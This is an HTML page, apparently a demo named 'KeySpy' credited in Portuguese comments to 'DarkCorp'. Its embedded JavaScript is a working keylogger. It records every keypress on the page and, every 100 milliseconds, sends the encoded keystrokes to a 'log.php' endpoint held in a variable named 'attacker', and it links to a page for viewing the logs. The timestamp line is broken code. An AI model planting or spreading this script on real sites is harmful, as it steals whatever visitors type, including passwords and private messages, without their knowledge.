<!-- Feito Por John Dark - DarkCorp -->
<!-- Usem bastante -->
<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>KeySpy</title>
</head>
<body>
    <script>
        var buffer = [];
        var attacker = 'log.php?c='
        document.onkeypress = function(e) {
            var timestamp = toString() | 0;
            var stroke = {
                tecla: e.key,
                data: timestamp
            };
            buffer.push(stroke);
        }
        window.setInterval(function() {
            if (buffer.length > 0) {
                var data = encodeURIComponent(JSON.stringify(buffer));
                new Image().src = attacker + data;
                buffer = [];
            }
        }, 100);
    </script>
    <textarea name="" id="" cols="30" rows="10" placeholder="Digite algo..."></textarea><br>
    <a href="data.html">Ver os logs</a>
</body>
</html>